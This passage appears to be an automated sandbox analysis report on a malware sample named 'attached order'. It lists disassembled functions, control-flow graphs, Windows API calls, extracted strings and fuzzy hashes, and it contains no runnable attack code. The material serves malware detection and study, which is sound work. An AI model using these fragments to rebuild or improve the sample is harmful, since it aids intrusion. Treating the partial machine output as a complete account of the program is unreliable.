                                                                                          Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 23 4145af-4145c9 24 4145cc-414607 23->24 25 414667-4146bd call 417e43 call 404993 call 425593 24->25 26 414609 24->26 43 4146dd-4146e3 25->43 44 4146bf-4146ce PostThreadMessageW 25->44 27 41460a-41460b 26->27 29 414637 27->29 30 41460d-41461f 27->30 29->27 32 414638-41463a 29->32 30->24 39 414621-414628 30->39 35 414644 32->35 36 41463c-414643 32->36 36->35 41 414635-414636 39->41 42 41462a-414633 39->42 41->29 42->41 44->43 45 4146d0-4146da 44->45 45->43
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                          • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                                                          • Opcode Fuzzy Hash: 394e34f50c0a247bce552346e383af64fefe3a966aa8cb87820a7dc397317cf4
                                                                                          • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5
                                                                                          Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 46 41464a-414685 call 42efb3 call 42f9c3 51 41468b-4146bd call 404993 call 425593 46->51 52 414686 call 417e43 46->52 57 4146dd-4146e3 51->57 58 4146bf-4146ce PostThreadMessageW 51->58 52->51 58->57 59 4146d0-4146da 58->59 59->57
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                                                          • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5
                                                                                          Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 60 414653-414665 61 41466d-414685 call 42f9c3 60->61 62 414668 call 42efb3 60->62 65 41468b-4146bd call 404993 call 425593 61->65 66 414686 call 417e43 61->66 62->61 71 4146dd-4146e3 65->71 72 4146bf-4146ce PostThreadMessageW 65->72 66->65 72->71 73 4146d0-4146da 72->73 73->71
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: t577G2K6$t577G2K6
                                                                                          • API String ID: 1836367815-2667467881
                                                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                                                          • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5
                                                                                          Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 254 417f0b-417f14 255 417ea6-417eb7 LdrLoadDll 254->255 256 417f16-417f1c 254->256 258 417eba-417ebd 255->258 257 417f1d 256->257 259 417f1e-417f2a 257->259 260 417f2c 259->260 261 417eec-417f00 260->261 262 417f2e-417f37 260->262 261->260 263 417f02-417f06 261->263 262->257 264 417f39-417f42 262->264 263->259 265 417f08 263->265 266 417f45-417fa1 264->266 267 417ecf-417ede 264->267 265->257 269 417ee0-417ee2 267->269 270 417eeb 267->270 270->261
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                                                          • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                          • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49
                                                                                          Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 271 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                          • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                                                          • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                          • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8
                                                                                          Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 276 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                          • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                                                          • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                          • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8
                                                                                          Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 286 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_attached order.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                          • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                                                          • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                                                          • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4
                                                                                          Function 01772B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 291 1772b2a-1772b2f 292 1772b31-1772b38 291->292 293 1772b3f-1772b46 LdrInitializeThunk 291->293
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b2e6b9a2d1db37ab872089de868904cb1fc24f1786d2527a73dfed6b50ef4d4b
                                                                                          • Instruction ID: ea7c6d21e9cbc3166d773f6f4ecfbb390b78a71ade1cc907d04b5d49e537bec3
                                                                                          • Opcode Fuzzy Hash: b2e6b9a2d1db37ab872089de868904cb1fc24f1786d2527a73dfed6b50ef4d4b
                                                                                          • Instruction Fuzzy Hash: 34B09B719554C5C5DF11E7645708717B900B7D0701F55C565D1564681F8738D091F176

                                                                                          Non-executed Functions

                                                                                          Function 017E8890 Relevance: 37.8, Strings: 30, Instructions: 268COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8A06
                                                                                          • *** enter .cxr %p for the context, xrefs: 017E8B3D
                                                                                          • The critical section is owned by thread %p., xrefs: 017E89E9
                                                                                          • read from, xrefs: 017E8ADD, 017E8AE2
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017E8AA6
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017E8B6F
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017E8944
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017E89CB
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E89BF
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 017E8ABF
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 017E8A62
                                                                                          • *** enter .exr %p for the exception record, xrefs: 017E8B21
                                                                                          • an invalid address, %p, xrefs: 017E8AFF
                                                                                          • The resource is owned shared by %d threads, xrefs: 017E89AE
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 017E8982
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 017E89F5
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017E890C
                                                                                          • The instruction at %p tried to %s , xrefs: 017E8AE6
                                                                                          • <unknown>, xrefs: 017E88AE, 017E8901, 017E8980, 017E89C9, 017E8A47, 017E8ABE
                                                                                          • *** Inpage error in %ws:%s, xrefs: 017E8A48
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017E8AB4
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017E8935
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017E8953
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 017E89A4
                                                                                          • write to, xrefs: 017E8AD6
                                                                                          • This failed because of error %Ix., xrefs: 017E8A76
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017E8AAD
                                                                                          • *** then kb to get the faulting stack, xrefs: 017E8B4C
                                                                                          • a NULL pointer, xrefs: 017E8B10
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017E8923
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                          • API String ID: 0-108210295
                                                                                          • Opcode ID: d9d1e07dabc4934161757d4e79a6990dc775a33369cbd404e4f9d4d4148f553e
                                                                                          • Instruction ID: 2b33f522d00c02f3efd465ba0340e58d1afd6b8d62c197f304acbbbb6662c276
                                                                                          • Opcode Fuzzy Hash: d9d1e07dabc4934161757d4e79a6990dc775a33369cbd404e4f9d4d4148f553e
                                                                                          • Instruction Fuzzy Hash: 198129B5A40220BFDB625B099C9EEAFFBF5EF5E610F000488F1052B21AD7759552CB63
                                                                                          Function 01768540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A5215, 017A52A1, 017A5324
                                                                                          • Critical section debug info address, xrefs: 017A522A, 017A5339
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A52ED
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 017A534E
                                                                                          • Invalid debug info address of this critical section, xrefs: 017A52C1
                                                                                          • corrupted critical section, xrefs: 017A52CD
                                                                                          • Critical section address, xrefs: 017A5230, 017A52C7, 017A533F
                                                                                          • undeleted critical section in freed memory, xrefs: 017A5236
                                                                                          • Address of the debug info found in the active list., xrefs: 017A52B9, 017A5305
                                                                                          • 8, xrefs: 017A50EE
                                                                                          • Critical section address., xrefs: 017A530D
                                                                                          • double initialized or corrupted critical section, xrefs: 017A5313
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A52D9
                                                                                          • Thread identifier, xrefs: 017A5345
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                          • API String ID: 0-2368682639
                                                                                          • Opcode ID: 98e33c25be16fd90b9670ae33a15160ea0886ccd954328a032e87b9fc13e35a7
                                                                                          • Instruction ID: 3be4f423f66c7209a7dd98ea51c2c55e394d34ffff0eafa081d4b625eb2ad23f
                                                                                          • Opcode Fuzzy Hash: 98e33c25be16fd90b9670ae33a15160ea0886ccd954328a032e87b9fc13e35a7
                                                                                          • Instruction Fuzzy Hash: F381A0B1A40318EFDB20CF99C885BAEFBB5FB48B14F244259F904B7245D7B4A941CB51
                                                                                          Function 01762919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A20EE
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2213
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A22A2
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A221C
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A2429
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2310
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A242E
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A23F5
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A240C
                                                                                          • @, xrefs: 017A23A5
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A22CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                          • API String ID: 0-4009184096
                                                                                          • Opcode ID: 076ee7d6e33203ceedc7ae3174e8998d383a65b6cc25d613260491a979ed1fac
                                                                                          • Instruction ID: 467ee835fe1a1883a972bbe27163040327ee56c4d175060bfa90291d4a961f35
                                                                                          • Opcode Fuzzy Hash: 076ee7d6e33203ceedc7ae3174e8998d383a65b6cc25d613260491a979ed1fac
                                                                                          • Instruction Fuzzy Hash: EF025FB1D042299BDB61DF14CC84BD9F7B8AB55304F4041E9EA0DA7246EB70AF84CF99
                                                                                          Function 017D86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          • API String ID: 0-2515994595
                                                                                          • Opcode ID: 9119e8bfb3c03f87cf4f3ca17a38652404444bb0aaf1771f449e436496a79166
                                                                                          • Instruction ID: 5bfa921834ca621bd8eacc844e93066a181c2261d19b2edad0878aac43ec9a6c
                                                                                          • Opcode Fuzzy Hash: 9119e8bfb3c03f87cf4f3ca17a38652404444bb0aaf1771f449e436496a79166
                                                                                          • Instruction Fuzzy Hash: 5A5180B15183199BD32ADF18D849BABFBECEB84654F04492DFA9983181E770E604C793
                                                                                          Function 0174AC20 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          • Opcode ID: 565fce58ac664bbd334a0dfdd0fd23b9bad6ccb86b1061decbd39ba447e6d9d5
                                                                                          • Instruction ID: 2d1aea9d437aff02b812a36d6a709eaf6bf22144bfe975f676a4a6dc8446349a
                                                                                          • Opcode Fuzzy Hash: 565fce58ac664bbd334a0dfdd0fd23b9bad6ccb86b1061decbd39ba447e6d9d5
                                                                                          • Instruction Fuzzy Hash: F31200B16483528FD735DF28C485BAAF7E0BF98704F44495DF9868B281E734DA44CB92
                                                                                          Function 017E0835 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          • Opcode ID: 3117361a02f80c659cee56c5346dee9617ca8be2d292aeee619d9fccc48b36df
                                                                                          • Instruction ID: 4cb84ea538aeeb82013c86faffbc214b2bc26bbc37b6dfcdb7ffa238b065af0c
                                                                                          • Opcode Fuzzy Hash: 3117361a02f80c659cee56c5346dee9617ca8be2d292aeee619d9fccc48b36df
                                                                                          • Instruction Fuzzy Hash: 0DF1F271B10256EFDB25CF68C488BAAFBF5FF09304F088499F5859B252C7B4AA45CB50
                                                                                          Function 017C8D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          • API String ID: 2994545307-3063724069
                                                                                          • Opcode ID: a4c08a8673ffc4bd6935554ed0b49617183726ad17141caca4cccf76aa68a89d
                                                                                          • Instruction ID: e03854fbfa9e33aa67d6e11929c31dff5e478e137ffff77eae00acdb9db3a40a
                                                                                          • Opcode Fuzzy Hash: a4c08a8673ffc4bd6935554ed0b49617183726ad17141caca4cccf76aa68a89d
                                                                                          • Instruction Fuzzy Hash: B1D1C372808316ABD762DE14C849B6BFBE8AF94F18F04092DFB9897154E770DD44CB92
                                                                                          Function 017B8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • VerifierFlags, xrefs: 017B88D0
                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B86BD
                                                                                          • HandleTraces, xrefs: 017B890F
                                                                                          • VerifierDlls, xrefs: 017B893D
                                                                                          • VerifierDebug, xrefs: 017B8925
                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 017B880F
                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B86E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                          • API String ID: 0-3223716464
                                                                                          • Opcode ID: b185b07669e835d95377ac2b94f517d7c3b10fa34f8ea7b6f39c1c74432d755f
                                                                                          • Instruction ID: cb8712e9c48b2364429acde2f88452894240f2e7b48fdb5cdbbf183f7565d01d
                                                                                          • Opcode Fuzzy Hash: b185b07669e835d95377ac2b94f517d7c3b10fa34f8ea7b6f39c1c74432d755f
                                                                                          • Instruction Fuzzy Hash: AC914771A80722AFD732EF6888C4BEAF79CEB51B14F044559FA41AB284C7309D00CB93
                                                                                          Function 017B4A57 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 017B4A75
                                                                                          • LdrpProtectedCopyMemory, xrefs: 017B4A74
                                                                                          • ***Exception thrown within loader***, xrefs: 017B4AA7
                                                                                          • LdrpGenericExceptionFilter, xrefs: 017B4A7C
                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 017B4AB8
                                                                                          • Execute '.cxr %p' to dump context, xrefs: 017B4B31
                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 017B4A86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
